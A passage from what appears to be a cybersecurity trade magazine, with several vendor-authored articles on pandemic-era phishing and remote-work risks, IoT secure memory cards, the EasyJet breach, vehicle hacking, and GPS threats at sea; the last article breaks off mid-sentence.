information about pandemic “cures” or various conspiracy theories and other content are likely filled with 

malware. 

2. Prevent Phishing 

Phishing schemes are simple. A hacker creates a formal-looking email and sends it out to a large group 

of recipients. Their goal is for someone to open the email and either click a link or download an 

attachment. That simple action then launches malware which infects the person’s computer and the 

linked company network. The hacker then controls the firm’s data, encrypts it, and holds it for ransom. 

The pandemic provides ample material for phishing schemes. Emails touting fake COVID-19 tests or 

miracle cures prey on people’s fear about the virus. Other emails pushing for donations to charities prey 

on people’s willingness to help, while directing money to fraudulent accounts. Many phishing emails 

mimic communications from local government agencies or the CDC, with official-sounding messages 

about pandemic news or recommended actions. 

Small businesses workers must read about the dangers of such emails, and how to recognize fake and 

dangerous communications. The typical phishing email gives itself away with some clues: 

• Amateurish design with outdated graphics and feel 

• Unprofessional-sounding content with misspellings 

• Odd URLs that do not match the company/organization (users can hover their mouse on links to 

see the destination address) 

• The email asks the recipient to confirm personal information, such as “Enter your SSN to see if 

you qualify for free COVID-19 testing” 

• Messages that play on panic and suggest urgent action are very often phishing schemes 

Remote employees need a better understanding about phishing emails and should err on the side of 

caution before clicking any links or attachments. Remind the employees that deleting the email is the 

safest move. 

3. Properly Manage BYOD 

With a massive move towards remote work comes the need for laptops and phones to connect to work. 

Some firms provide employees with devices. Others use a BYOD, or “Bring Your Own Device” policy that 

allows employees to utilize their personal device to access work software. 



There are multiple risks when employees use their own devices for work. Since they’re at home and 

comfortable with their phone and laptop, many users will engage in riskier searches and look at sites 

they’d never consider at the workplace. These sites increase exposure to malware, which then puts the 

connected company networks at risk. 

Small businesses must take the time to implement personal device policies. This includes detailing how 

employees are accessing and storing company data. For example, are staff saving information to their 

laptops? Are they using unsecured cloud storage through Google or Dropbox instead of the corporate 

cloud? Do employees use strong two-factor passwords? What happens with data access when a remote 

worker leaves a company? A formal plan is essential for protecting both the company and the employees. 

Companies must strike a balance during this work-from-home period. They need to protect their data 

through rules and processes while also giving staff enough flexibility to access needed information. There 

are also privacy considerations in play. Small business owners must understand the employee’s family 

members are also using the home Wi-Fi, so there’s only so much control the owners can exert. A solid 

approach for remote workers is to create formal guidelines to include mobile device management 

software that automates updates, features virus detection, and gives employees limited control. The key 

is transparency. Both the employee and employer are on the same page regarding expectations and 

rules. And as the pandemic eases in some areas, business owners must decide if workers can remain at 

home, need to come back to offices, or if they will adopt a hybrid approach. 

Key Takeaway 

During the pandemic, small business owners are pivoting while trying to retain good employees. 

Cybersecurity threats are an additional unneeded stressor for already strained companies. Thankfully, 

by following guidelines for remote workers and managing risks, firms can reduce the chances of a 

cybersecurity event and focus on making it through the crisis. 


Bill DeLisi is one of the world’s most authoritative experts on 

cybersecurity. He is currently the Chief Executive Officer, Chief 

Technology Officer and a founding member of the Board of 

Directors for GOFBA, Inc. DeLisi has more than 30 years of 

experience in the computer industry, including holding the position 

of Chief Technology Officer at several companies. He has worked 

closely with Microsoft Gold Certified Partners, helping pioneer 

“cloud” computing and creating security infrastructures that are still 

in use today. DeLisi is responsible for the development of 

proprietary technology that serves as the backbone of GOFBA’s 

platform and has over 30 certifications with Microsoft, Cisco, Apple, 

and others, which includes the coveted Systems Engineer with 

Advanced Security certification, as well as expert status in Cloud 

Design and Implementation. 

Bill Delisi, CEO of GOFBA. Bill can be reached via email at bill@gofba.com or on his company website 

www.GOFBA.com. 



IOT Security Embedded in Memory Cards 

AS DEVICES, MACHINERY AND MANUFACTURING PLANTS GET SMARTER, THEY ALSO 

BECOME MORE VULNERABLE. 

By Hubertus Grobbel, Vice President Security Solutions, Swissbit. 

When designing networked devices, machinery and production facilities, developers need to place more 

focus on security aspects. Swissbit now offers a flexible, hardware-based approach that includes TPM 

(Trusted Platform Module) and data encryption. 

For IT- and data-security, systems communicating over the Internet or via their gateways in the IoT 

(Internet of Things), need to have a unique and non-cloneable identity. Systems must also be able to 

send, receive and store cryptographically and heavily secured data. Solutions involving only the use of 

software rarely offer sufficient protection. This presents developers and manufacturers with great 

challenges. 

Swissbit, the storage and security expert, offers a new hardware-based approach. Developers of 

embedded systems for industrial applications know Swissbit as the only independent European 

manufacturer of flash memory products. Many see the Swiss company, manufacturing in Germany, as 

their top choice for robust, durable SSDs with PCIs and SATA-interfaces, CompactFlash, USB-flash 

drives, SD and microSD memory cards and managed NAND BGAs. 

Based on decades of experience in the protection of stored data, Swissbit has now developed a new 

advanced approach to security for embedded IoT devices. The thought process behind the development 

is that every device needs memory to act as a boot medium for log files, and data cache memory in case 

of network failures. These memory interfaces can and should have security features. 



Security in memory card format 

Swissbit’s new security solution consists of a flash memory chip, produced and tested for industrial 

requirements. This chip is run using a special version of the durabit firmware with integrated AES 256-bit 

encryptor (Fig. 1). The DP (Data Protection) version encrypts and protects all data in various ways (CD- 

ROM mode, PIN protection, hidden memory, WORM mode). For the hardware-based protection of the 

communication in the IoT, another security anchor is required. Swissbit’s security modules come with 

solutions such as an Infineon/NXP Smart Card Chip CC EAL 5+/6+. An API, a SDK and a PKCS#11 

library are available for application development. 

Fig 1. The structure of a microSD card with security features. 

Designating an ID to things 

Security experts trust in microSD cards with secure element for encrypting mobile phone 

communications. Similar to the communication between people, the communication of the things across 

the Internet also needs to employ identification, authentication and authorization. In other words, how 

does a “thing” know that the data or data queries received from another “thing” are correct and that the 

source of a message is truly the system component that it claims to be? Swissbit security memory media, 

with secure element, provide applications and systems with a unique identity. “Things” get a counterfeitproof 

ID and as such, networked systems can be protected from misuse, “identity theft” and data access 

can be restricted. Smart cards, that are integrated onto memory cards, provide systems with noncloneable 

identities, transforming them into uniquely identifiable M2M (machine-to-machine) 

communication participants, that can authenticate themselves and send and receive cryptographically 

heavily secured data. 

Another important device-specific application for these Swissbit solutions is Trusted Boot. Trusted Boot 

ensures that software can only be run on specific hardware or hardware classes. A secure flash memory 



card can be used to manage software licensing and feature activation. Access control, code encryption 

or digital signature allow the definition and management of different software configurations for products. 

Retrofittable and future-proof 

In comparison to a soldered TPM, the idea of a pluggable security module might at first seem unusual. 

However, older machinery and systems generally have a USB interface or interfaces for memory cards 

(Fig. 2). Therefore, the big advantage of using pluggable security modules is that existing devices can 

easily be retrofitted and secured using Swissbit security memory. 

This ability to retrofit devices offers another advantage in the constant race to keep up with cyber security. 

Attack and defense methods develop cyclically and harmonizing them with for example the project 

lifecycle of an industrial plant is challenging. A situation could arise where it necessary to allocate a new 

ID with improved cryptography technologies to the M2M communication participants. Swissbit’s 

retrofittable solution makes this possible. 

Fig 2. Memory interfaces, such as USB, can be used to retrofit a TPM function. 

Outlook 

In response to the rapidly increasing market demand for embedded IoT, Swissbit opened its new factory 

in October 2019, located in Berlin, Germany. This factory is equipped with state-of-the-art advanced 3D 

chip scale packaging technology, developing and producing customized system-in-package and multichip 

module designs for its customers. This technology facilitates not only the integration of 

microcontrollers, NAND chips and crypto chips, but also sensors, wireless chips and antennas. Using 

memory interfaces with TPM and encryption components for security solutions might only be the 

beginning, with the scope for the addition of further functionalities that can be miniaturized and integrated. 




Hubertus Grobbel is the Vice President Security Solutions, 

at Swissbit 

Hubertus can be reached online at [email] 

and at our company website https://swissbit.com/en/ 



How To Fight A Virus: Lessons From Cybersecurity 

By Yotam Gutman, SentinelOne 

There has been a great deal of conversation around the similarities between the spread of the Covid-19 

virus and that of computer viruses. And indeed, as the first global pandemic to occur during the age of 

connectivity, this comparison is valid. But while most focus on how we can leverage the knowledge gained 

in the “real world” in identifying and stopping the spread of plagues in the virtual world, I would like to 

offer another perspective. 

Perhaps we in cybersecurity can return the favor. Perhaps the medical world can take the lessons learned 

in three decades of fighting “cyber viruses” and implement these in their fight to mitigate the Coronavirus? 

History 

Originally, the type of computer software described as “a program that can infect other programs by 

modifying them to include a, possibly evolved, version of itself” was named “Virus” by Fred Cohen in his 

1986 Ph.D. thesis. Another biological reference made its way into the computer lingo when the first worm 

was unleashed (although the phrase was used in an earlier sci-fi novel). 

In the last couple of years, computer viruses, or more widely the panoply of malware as we think of 

cybersecurity today, have undergone rapid evolution that has made them much more difficult to identify 

and mitigate: 



More variants: 439,000 new malware variants were detected in 2019. That’s a 12.3% increase over the 

previous year. 

More capable: Modern malware threats are far more capable than the old viruses spreading through 

illegal copies of software distributed via floppy-disks. Today’s malware can steal passwords, exfiltrate 

sensitive data, encrypt and delete data, and much more. 

Harder to detect: Malware authors work hard to make their software difficult to detect. This includes hiding 

it in legitimate documents (aka “weaponizing” Word, PDF and Excel documents), utilizing detectionevasion 

mechanisms (like avoiding execution in sandboxed environments), and using legitimate software 

update mechanisms, all to make the work of the defenders harder. 

More aggressive: Some malware types are extremely aggressive; they scan for open RDP ports, bruteforce 

their way onto a device, and then move laterally within the organization’s network, abusing 

password-protected servers and seeking sensitive data, all without the knowledge of the victim. 

Fast: contemporary malware is extremely fast and works at machine-speed to bypass protection 

mechanisms and achieve its goals—ransomware like “WannaCry” disabled entire organizations in 

minutes. 

Adopting Cybersecurity Response to Fight Covid-19 

To mitigate today’s plethora of rapidly evolving cyber threats, the cybersecurity industry has developed 

several methodologies. These (after adaptation) could be used to reduce the spread of malicious 

software and to mitigate its effects. I will refrain from discussing the obvious virus/Anti-virus analogy. 

Obviously, a vaccine for a computer “virus” would be the answer, but estimates suggest that such a 

vaccine would not be available in the next 12-18 months, and there’s a lot we can do until then: 

Zero trust policy- A methodology that defies the traditional security assumption that everything inside the 

perimeter (protected by the firewall) is trusted. The main principle of Zero Trus is “never trust, always 

verify”. This means that every user is asked to verify their credentials every time they wish to “enter” the 

organization and that every file and process are being constantly monitored – even if they have been 

“authorized” to run on the computer. 

In a similar manner, humans should consider that other humans are carriers, and only “trust” them after 

they have been tested negative (or at the minimum, have had their temperature taken). 

Detection beats prevention: following a similar line of thought, most organizations today operate under 

the “Assume a Breach” paradigm. Instead of striving to identify and mitigate 100% of threats 100% of the 

time, they assume that some threats would be able to infect them and concentrate their efforts on quickly 

finding these and stopping them before they could do more harm. 

Similarly, it is prudent to assume that humanity would not be able to vanquish this virus, and we will be 

playing “whack-a-mole” with it for the foreseeable time. Given that this is the case, it’s prudent to invest 

in rapid detection of the infection (quick detection kits, even home detection kits), ensure those that are 

sick are given quick treatment, and continue to monitor the entire population for outbreaks. 



Segmentation; an important principle that limits the “movement” within the organization, so that intruders 

cannot move freely and infect other parts of the organization. 

The real-life manifestation would be to identify infection “hot-spots”, lock these down and then tend to 

these infected rather than to lock-down entire countries. 

Risk modeling: it might be possible, perhaps, to provide 100% security, 100% of the time, but the cost to 

the organization would be detrimental; either the security costs would be through the roof, or the security 

restrictions imposed to maintain 100% security would cause the business to stand still. Instead, a CISO 

conducts risk assessments and prioritizes security spending to mitigate the most acute threats and 

secure the most valuable assets. 

Healthcare officials should do the same and ensure that the most sensitive segments of the population 

(elderly, sick) are being shielded from the disease and if need be, are provided with better care. 

Intelligence intake: fighting a stealthy enemy is hard because you don’t know what to expect. Security 

professionals, governments, and those in the security industry have been formally and informally sharing 

information about malware, cybercrime groups, and data leaks for a long time. This has proved to be 

immensely helpful in fighting and defeating cybercrime rings. 

Such collaboration should also be adopted by global scientific, medical communities, governments, and 

healthcare organizations. As this threat is new to humanity, we should all share information about 

detection and treatment mechanisms and notify others when we think we’ve made breakthroughs in 

finding a cure or a vaccine. 

Conclusion 

We can debate the similarities between biological and computer “Virus” (which, some believe, more 

resembles a Bacteria than a virus), but the analogy is, for the most part, correct. Viruses are dangerous 

to the victims, and they spread quickly through the population until a cure, or a vaccine is found. The 

spread of the Coronavirus pandemic and its impact on our lives is nothing like the world has seen before. 

It spread almost at machine speed and overwhelmed countries and healthcare organizations. We believe 

that utilizing the lessons learned by the cybersecurity industry in the past 3 decades could help to thwart 

the Coronavirus pandemic. 




Lt. Commander (Ret.) Israel Navy, Yotam Gutman, has 

filled several operational, technical, and business positions 

at defense, HLS, Intelligence, and cybersecurity 

companies, and provided consulting services for numerous 

others. Yotam joined SentinelOne 6 months ago to oversee 

local marketing activities in Israel and contribute to the 

global content marketing team. Yotam founded and 

managed the Cybersecurity Marketing Professionals 

Community, which includes over 300 marketing professionals from more than 170 cyber companies. 

Yotam was chosen as one of the 5 Security Influencers to Follow on LinkedIn. 



How to Combat Cybersecurity Attacks & Cyber Warfare 

By Adnan Olia, Chief Operating Officer and Co-owner of Intradyn 

It’s no secret that cybersecurity attacks and cyber warfare are real challenges and threats to the safety 

of individuals, businesses, organizations — and especially the government. Personal and professional 

data, including passwords, credit card and bank account information, and Social Security numbers can 

be vulnerable. Plus, it can take months — even years — to recover from cyberattacks and cases of 

identity theft. According to CNBC, cyberattacks cost businesses of all sizes an average of $200,000, and 

“60% go out of business within six months of being victimized.” 

A professor of business technology predicted in a recent Forbes article that cyberattacks will be more 

prevalent in 2020 “because it’s the cheapest, easiest, fastest, and most effective form of warfare we’ve 

ever seen, and because cyberwarfare defenses are more vulnerable than they’ve ever been.” 

But what is cyber warfare, exactly? The RAND Corporation defines the term as “the actions by a nationstate 

or international organization to attack and attempt to damage another nation’s computers or 

information networks through, for example, computer viruses or denial-of-service attacks.” 

There are many types of attacks and warfare, including phishing, ransomware, and mobile- and cloudbased 

attacks. We’ll outline some of the most common and offer solutions to help you take the necessary 

precautions and steps toward securing your data and private information. 



What Are the Different Types of Threats? 

Phishing 

The U.S. Securities and Exchange Commission defines phishing as “the use of fraudulent emails and 

copy-cat websites to trick you into revealing valuable personal information — such as account numbers 

for banking, securities, mortgage, or credit accounts, your Social Security numbers, and the login IDs 

and passwords you use when accessing online financial services providers.” 

The goal, of course, is to use your personal information to steal your money and/or your identity. Phishing 

also targets short message service (text messages) — and there’s also the possibility of “spearfishing by 

video,” which allows hackers to “leverage new tools such as ‘deep fake’ technology to look and sound 

like a trusted person (e.g., a Facetime with an attacker posing as a CEO).” 

An article about 2020 cybersecurity predictions from SC Media predicts that “company microtargeting 

with industry-specific tools will rise.” It’s more important than ever that organizations have the proper 

controls in place to educate their employees and detect these kinds of threats. 

Ransomware 

The Department of Homeland Security defines ransomware as “a type of malicious software, or malware, 

designed to deny access to a computer system or data until a ransom is paid. Ransomware typically 

spreads through phishing emails or by unknowingly visiting an infected website.” 

According to a recent Forbes article, business ransomware attacks were on the rise in the first quarter of 

2019, and the trend is expected to continue in 2020 because “as the FBI softens its stance on businesses 

paying ransoms, the number of ‘successful’ ransomware attacks (i.e. those in which the ransom is paid) 

will double, with total losses of all reported attacks increasing significantly.” 

Mobile Attacks 

The Pew Research Center estimates that more than 5 billion people around the globe have mobile 

devices (over half of which are smartphones), and according to HubSpot, 52% of web traffic around the 

world is mobile. 

With so much widespread cell phone ownership and use, it’s no wonder that hackers are threatening 

mobile devices. According to Lookout, “traditional secure email gateways block potential phishing emails 

and malicious URLs, which works for protecting corporate email from account takeover attacks, but 

neglects mobile attack vectors, including personal email, social networking, and other mobile centric 

messaging platforms such as secure messaging apps and SMS/MMS.” 

It’s also worth noting that with every new piece of technology (such as the latest smartphone model) 

comes security challenges. For example, the debut of 5G means new problems with malware aiming to 

take advantage of the security features, according to AVG. 



Cloud-Based Attacks 

According to Threatpost, “as more corporate infrastructure moves to the cloud, so will the focus of 

criminals.” This means that while conducting an attack will be more of a challenge, attacks may become 

more sophisticated and more common. 

Businesses and organizations are also more confident when it comes to the cloud. But confidence doesn’t 

always translate to tighter security measures. According to Forbes, “60% of organizations don’t 

understand the shared responsibility model when it comes to who secures workloads in the cloud. This 

will create a false sense of security in cloud security providers by their customers, as the latter are 

responsible for securing privileged access to their cloud administration accounts and workloads.” 

Artificial Intelligence and Voice Phishing 

As technology becomes more advanced, so do the types of cyberattacks. For example, “deepfake 

technology” can be used to exploit people in scams. According to MSNBC, the term deepfake refers to 

instances where creators have produced digital content by manipulating images, voices, images — and 

even create fake videos that look real. In one instance, according to Forbes, a CEO gave up $243,000 

due to a deepfake scam. 

An article about 2020 cybersecurity predictions in SC Magazine asserts that “voice phishing will become 

the new phishing bait.” In other words, it’s now easier than ever for scammers to sound like someone 

else. High-level people such as executives and politicians are expected to face heightened risk with 

advanced deepfake technology. Those scammers can then leave voicemails (or speak directly with 

callers) asking for donations or for personal information. 

How to Protect Yourself: Solutions & Tips 

There are many ways to protect yourself — and your business or organization — from cyberattacks and 

cyberwarfare. The Department of Homeland Security (DHS) is a good place to start and provides the 

following tips: 

• Maintain up-to-date software and operating systems 

• Ensure that your passwords are strong 

• Remain vigilant and watch out for suspicious activity 

• Do not click on links or open emails if you’re unsure 

• Do not provide personal information 

• Use secure internet connections 

• Back up your folders and files 

• Protect your home and/or business network 

Protecting your email is especially important. Investing in a good email archiving solution can also help 

you mitigate a potential attack by offering backup and disaster recovery options. 

It’s also important to be aware of the types of email messages you’re receiving. Poor spelling and 

grammar, mismatched URLs, messages asking for personal information, and notes where you didn’t 

initiate the action are just some examples of signs of a possible phishing attack. 



Even though DHS recommends using two methods of verification, many other resources recommend 

multi-factor authentication. This means that a computer (or mobile device) will only grant you access after 

you present at least two pieces of “evidence” that only you would know or have access to. 

“Evidence” includes information such as passwords and PIN numbers or physical characteristics such as 

(fingerprint, voice recognition, etc.) The authentication could also be a physical item, such as a security 

token. 

Many organizations are also adopting Disaster Recovery-as-a-Service (DRaaS), which is “defined as 

providing a remotely hosted disaster recovery service to protect a business’s data and applications,” 

according to Carbonite. 

With the sheer volume and variety of cyberattacks and warfare targeting individuals and organizations, 

it’s more important than ever to take the appropriate precautions to ensure that personal information and 

data remains secure and safe. 


Adnan Olia, Chief Operating Officer and Co-owner of Intradyn 



COVID-19 And the Easyjet Hack - A Perfect Phishing 

Storm 

By Shachar Daniel, Safe-T’s CEO 

As if the airline industry didn’t have enough to worry about at the moment, on May 19, EasyJet, the UK’s 

biggest budget airline announced it had been breached. Exposed in the attack were the email addresses 

and travel information for 9 million customers. A small group of customers also had their credit card 

details, including the CVV, exposed in the attack which lasted from October 2019-March 2020. 

Although EasyJet first learned about the attack in January, they only began informing those customers 

whose credit card information was exposed in April. The airline said they did not disclose the attack earlier 

due to the complexity involved in piecing together which systems and which individuals had been 

affected. According to the UK's Information Commissioner's Office, “This was a highly sophisticated 

attacker. It took time to understand the scope of the attack and to identify who had been impacted." 

Bad Timing - COVID-19 and Airline Scams 

The EasyJet hack just happens to come at a spectacularly rotten time, as airlines around the world, 

EasyJet included, are dealing with severe losses due to COVID-19. According to Dr Jason Nurse of the 

Kent Interdisciplinary Research Center, “It is clearly a difficult time for the travel industry considering the 

impact of COVID-19 on operations. A cyber-attack is the last thing an airline would want to deal with 

now.” 



To make matters even more complicated, authorities have warned customers to be on the lookout for 

phishing emails offering refunds on flights, now that their personal details may be up for grabs on the 

darkweb. According to privacy expert Ray Walsh, "Anybody who has ever purchased an EasyJet flight is 

advised to be extremely wary when opening emails from now on...Phishing emails that leverage data 

stolen during the attack could be used as an attack vector at any point in the future.” 

In fact, a recent statement from EasyJet compelled customers to think critically when opening EasyJet 

emails, saying "We are advising customers to be cautious of any communications purporting to come 

from EasyJet or EasyJet Holidays." 

But EasyJet was not the only airline to have phishing campaigns associated with it over the course of the 

pandemic. As the impact of COVID-19 began to take hold in late March and airlines started canceling 

flights, Emirates Airlines warned customers about circulating fake flight refund emails and email security 

provider Mimecast alerted authorities to a major uptick in flight-related email scams involving a variety of 

airlines. Other security firms noted a rise in voice-based flight cancellation scams, wherein scammers, 

posing as airline agents, called random people to discuss purported flight cancellations, and in the 

process, tried extracting personal information. 

And now, as airlines across the world attempt to cut their losses, they are offering heavy discounts on 

flights, for whenever regular flights do resume. As inboxes fill up with enticing promotions offering deals 

on future flights, customers should remember that while many of these emails are legitimate, a significant 

portion are phishing emails, cashing in on the confusion created in COVID-19. 

How to Spot a Travel-Based Phishing Email 

Meanwhile, it’s important to note that since travel information was included in the stolen EasyJet data 

set, phishing emails sent to those customers may be highly targeted and include real elements, like dates 

and destinations, making the emails seem legitimate. If your data was exposed in the EasyJet hack, there 

are some relatively simple ways to protect yourself from falling prey to the ensuing phishing threats. 

What’s more, these tips can be just as easily applied to any trending COVID-19 airline email scams out 

there today. So when you get flight promotions or cancellation notices, be sure to: 

- Look at the sender's email address - does it match the name of the airline or is it slightly off? For 

example, if it says EasyJetTravel.com, JetBlueFlights.com, or SouthWestTickets.com, you can 

rest assured it’s a scam. 

- 

- Avoid any email requesting personal information, such as credit card information, dates of birth, 

or social security numbers. 

- 

- Delete messages that include links or attachments, which are often filled with malware payloads. 



- Think twice when it comes to promotions requiring the reader to take action NOW! Scammers try 

to get their targets to act impulsively, before critical thinking can get in the way. If there’s no time 

to make a thought-out decision, that's a bad sign. 

COVID-19 is waning and the world is starting to open up again. This is great news for consumers as well 

as the airline industry—but as always, remember that scammers love to capitalize on fluctuating 

circumstances—so proceed with caution before booking any deals. 


Shachar Daniel is the CEO at Safe-T and one of its cofounders. 

In his role, he is responsible for the overall vision, 

company strategy, day-to-day operations, and for growing 

Safe-T’s business and presence around the world. Shachar 

brings to Safe-T more than 14 years of experience in various 

managerial and business roles. Prior to founding Safe-T, he 

was program manager at Prime-sense, head of operations for project managers at Logic and project 

manager at Elbit Systems. He is an experienced manager with a passion and high commitment for project 

delivery. Shachar holds an Executive MBA from The Hebrew University, an MBA from The College of 

Management Academic Studies in Israel and a B.Sc. in Industrial Engineering from The Holon Institute 

Technology. 



Should We Be Worried About Vehicle Hacking? 

And what can we do about it? 

By Martin Banks 

With more connected devices than ever, cybersecurity is a more prominent issue today than ever before. 

You'll see articles and discussions about security for computers, smartphones and wearables, but these 

may not cover everything. As more vehicles are including internet-based functions, should we be worried 

about vehicle hacking? 

Ten years ago, this question would seem like nothing but science fiction. Now that we're on the cusp of 

the driverless vehicle revolution, though, it may require some attention. Here's a closer look at connected 

cars and whether they present a cybersecurity risk. 

The Rise of the Connected Car 

To understand the gravity that vehicle hacking may present, you first have to know how prevalent 

connected vehicles are. When you look at the data, you realize these technologies may be more 

widespread than you thought. There were more than 50 million shipments of connected cars in 2019, up 

45% from the year prior. 



With an adoption rate like that, it won't be long before connected cars cover the roads. Not everyone 

needs to drive an internet-enabled vehicle for them to impact everyone, either. Any hacked automobile 

endangers nearby drivers and passengers, so even with a low penetration rate, they could be risky. 

Cars aren't the only connected vehicles out there, either. Other modes of transportation, like ships, are 

also becoming increasingly connected. 

How Are Vehicles Vulnerable? 

It's evident, then, that there are enough connected vehicles for hacking to be a concern. The number of 

potential targets isn't the only factor at play, though. You also have to consider what makes these cars 

targets in the first place. 

The answer to this one is relatively straightforward. You can hack almost anything with an internet signal, 

especially if it's an active connection. Internet-based functions in cars, like online radio, are active as they 

send and receive commands, meaning you can hack them. 

Some vehicles use Internet of Things (IoT) devices to do things like track engine performance or measure 

fuel efficiency. These sensors provide hackers with another point of entry if they don't include proper 

security features. 

Is There a Precedent for Vehicle Hacking? 

So has anyone hacked into a vehicle before? Yes, and vehicle hacking incidents may be more frequent 

than you'd think. According to the cybersecurity firm Upstream, there were roughly 150 car hacking 

incidents in 2019. 

Considering how many connected cars there are, that figure isn't that massive. You should also consider 

that this number also includes hacks on automotive companies, not just cars themselves. Still, it 

represents a 99% increase over 2018's hacking incidents, which is a troubling trend. 

While these real-world instances may not have been too harmful, tests show that they could be. In 2015, 

hackers remotely cut the power of a Jeep as it was driving in a demonstration for Wired. If this were to 

happen outside of a safety showcase, it could have disastrous results. 

Responses from Manufacturers 

Some good news is that vehicle manufacturers are aware of these potential risks. After the 2015 Wired 

hacking demonstration, Fiat Chrysler sent 1.4 million car owners flash drives containing software patches. 

Similarly, Tesla updated all Model Xs after researchers hacked into one and activated its brakes. 

Both of these instances involve manufacturers responding to an issue they initially missed. Had malicious 

actors exploited these problems before white-hat hackers, they could've been much more severe issues. 



Still, with these cases attracting media attention, more manufacturers will take cybersecurity seriously 

while in production. 

As vehicles become more teched-out, it means more tech experts are involved in the design and 

production process. With the presence of these voices, manufacturers could take a greater interest in 

cybersecurity. 

Defending Against Vehicle Hacking 

Drivers of connected cars aren't helpless concerning cybersecurity. Built-in cybersecurity systems are a 

necessary step in vehicle production, but drivers can protect themselves in other ways. The rising 

concerns over vehicle cybersecurity have led to the emergence of companies selling third-party security 

solutions for cars. 

Operators using IoT devices in their vehicles should ask the device providers about security features. 

Experts also recommend that they require transparency and high standards from any company that 

receives data from these sensors. Fleets shouldn't work with any business that doesn't showcase 

appropriate data governance. 

If more owners and drivers speak up about security issues, manufacturers will likely respond to the market 

pressure. As the public shows interest in security, the producers will offer it. 

Security Expert Recommendations 

To recap everything we've established so far: hacking vehicles is possible and has some precedent, and 

manufacturers are addressing the issue. Additionally, drivers can protect themselves as a supplementary 

layer of security. The last step in deciding whether this is a cause for worry is looking to the experts. So 

what do they think? 

Cybersecurity authorities have become increasingly concerned with vehicle hacking in the past few years. 

Late last year, the Federal Bureau of Investigation (FBI) warned of growing cyberthreats in the automotive 

industry. The Bureau cited the increase of data coming from vehicles as a reason why hackers may target 

cars. 

In response to these threats, the FBI suggested auto companies take cybersecurity more seriously. 

Notice they didn't say to abandon the concept of a connected car altogether. Manufacturers should just 

keep security at the forefront. 

Vehicle Cybersecurity Today and Tomorrow 

With all these factors in mind, should we be worried about vehicle hacking? There may not be a cause 

for worry, but there is certainly reason for increased concern. This issue is a minor one right now, but it's 

also growing. It requires adequate attention, but not panic. 



Vehicle hacking isn't a widespread problem today, but it could become one in the future. Manufacturers 

should start investing in more thorough security solutions as they add more internet-enabled functions to 

their automobiles. By addressing these issues today, we can stop a crisis tomorrow. 

The Age of IoT Brings New Challenges 

Technological revolutions always come with some growing pains. As the IoT becomes more prevalent, 

cybersecurity likewise turns into a more pressing concern. That doesn't mean we should avoid the era of 

connectivity, but that we should take care to secure it. 

You shouldn't worry about vehicle hacking, but you should take it seriously. With a widespread effort to 

combat security issues before they appear, the future of connected vehicles will come sooner. 


Martin Banks is the founder and Editor-in-Chief of Modded. You can find 

his writing all over the internet. He covers tech, gear, cars, and more. 



Cyber Attacks at Sea: Blinding Warships. 

Are GPS completely vulnerable to cyberattacks? 

By Julien Chesaux, Cyber Security Consultant, Kudelski Security 

Who Controls the Sea, Controls the World 

The annual multilateral exercise between the U.S. and Thai army, named “Cobra Gold”1 sees the 

deployment of the latest navy warships as a proof of military domination in a contested region and 

reminds us the fragility of technologies at sea as a chain of incidents demonstrated in 2017. 

The world’s oceans can be beautiful and awe-inspiring, but also very dangerous. Most importantly, they 

are strategic for the global economy and, consequently, countries compete to control them. Statistics 

reveal the high value of the high seas: 70% of the globe is covered by water and over 90% of the world’s 

trade is carried by sea. Moreover, the global merchant fleet totals 50,000 ships that move 9 billion tons 

of merchandise annually, representing a turnover of $2,000 billion.2 

Human history is punctuated with many regional or global exchanges that happened through decisive 

battles at sea. The battle of Salamin saw the Athenians saving the concept of democracy against the 

Persians. The battle of Actium allowed the Roman Republic to become an Empire. The battle of Trafalgar 

destroyed Napoleon’s aspiration to invade Britain. 

At the beginning of the 20th century, in 1905, the battle of Tsushima humiliated the Russian Empire and 

opened the pathway for an Imperial Japan. During WWI, the battle of Jutland contained the Imperial 

1 

WILLIAMS Zachary. “Cobra Gold 2020: America’s Strategic Shift in Southeast Asia”, The Diplomat, Mar 6, 2020 

https://thediplomat.com/2020/03/cobra-gold-2020-americas-strategic-shift-in-southeast-asia/ 

2 

Sea Europe. “2017 Market Forecast Report”, Sea Europe, 2016 

https://maritimetechnology.nl/media/2017-Market-Forecast-Report-finaal.pdf 



German Navy and WWII witnessed the battle of Midway that established the U.S. as the new navy 

superpower after the destruction of Japanese’s aircraft carriers fleet in the Pacific. More recently, the 

Crimea annexation by Russia was, even if triggered by different causes, a geopolitical move to avoid the 

loss of access to the Mediterranean Sea. 

The current hawkish posture and the “gunboat diplomacy” followed by China is not a surprise regarding 

its ambitions to play a greater global leadership role, to protect its shores where most of its economic 

activity occurs (its “strategic belt”), and to defend its natural resources and sea lines to supply them from 

the South and East China Seas (represented by the Nine-Dash) to the Indian Ocean (currently projected 

as the “String of Pearls”3). 

A Global Rivalry with Multiple Bottlenecks 

Because globalization increases global trade, sea roads are busy and multiple bottlenecks are under the 

spotlight, including many straits and canals. For instance, the Strait of Malacca represents 40 % of global 

trade, 50% of energy trade, and is indispensable for regional hegemons like China and Japan. 

Another geostrategic path is the Strait of Hormuz, between Oman and Iran, through which all the Gulf oil 

trade moves. In this region, the U.S. Navy is face-to-face with the Iranian one. The USS Harry S. Truman 

aircraft carrier is presently deployed in the Arabian Sea (near Oman) as part of the U.S. 5th fleet, which 

covers the Middle East, a crucial region for the U.S. as 18% of its imported oil comes from the Persian 

Gulf countries.4 In 1967, the blockade of the Strait of Tiran by Egypt was used as casus belli by Israel 

and started the Six-Day War. Indeed, the Strait is the only way to leave the Gulf of Aqaba and gain access 

to Iran’s oil. Other important passages such as the Bab El-Mandab Strait, the Danish Straits, or the 

Bosporus are well-known narrow gullies. 

Canals are equally critical for international trade, especially the Suez and the Panama ones. The former 

was the theater of a war in 1956 between Egypt and a French, British and Israeli alliance (encompassed 

in the secretive Protocol of Sèvres) to regain control after being nationalized by the infamous Egyptian 

President Nasser. The latter, under U.S. control for almost 100 years, was retroceded to Panama and 

recently enlarged to accommodate the new bigger ships and ensure revenue to Panama as it represents 

5.5 % of its GDP. 

The Art of Hacking Navigation Systems 

In 2017, some incidents at sea have sparked interrogations as hundreds of South Korean fishing vessels 

returned earlier to port after their GPS (Global Positioning System) signals were jammed, allegedly by 

3 

HUGHES Lindsay. “String of Pearls Redux: Increased Concern for India”, Future Directions International, Nov 13, 2018 

http://www.futuredirections.org.au/publication/string-of-pearls-redux-increased-concern-for-india/ 

4 

U.S. Energy Information Administration (EIA). “How much petroleum the United States import and export?”, EIA, Apr 4, 2017 

https://www.eia.gov/tools/faqs/faq.php?id=727&t=6 



North Korean hackers.5 Later this year, a ship in the Black Sea reported to the U.S. Coast Guard 

